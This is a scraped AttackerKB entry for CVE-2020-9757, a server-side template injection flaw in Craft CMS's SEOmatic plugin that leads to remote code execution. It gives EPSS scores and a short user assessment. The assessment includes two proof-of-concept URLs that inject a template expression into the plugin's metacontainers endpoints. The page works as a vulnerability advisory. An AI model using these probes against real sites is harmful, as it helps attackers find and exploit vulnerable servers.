Lucene search

K
attackerkbAttackerKBAKB:732A42FD-8FC3-4175-8B97-AB415EE45A44
HistoryMar 04, 2020 - 12:00 a.m.

CVE-2020-9757

2020-03-0400:00:00
attackerkb.com
18

0.962 High

EPSS

Percentile

99.5%

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

Recent assessments:

Mad-robot at July 05, 2020 1:31pm UTC reported:

Description-

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

POC-

HTTP://localhost/actions/seomatic/meta-container/meta-link-container/?uri={{7+'7'}}
HTTP://localhost/actions/seomatic/meta-container/all-meta-containers?uri={{7+'7'}}

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5

0.962 High

EPSS

Percentile

99.5%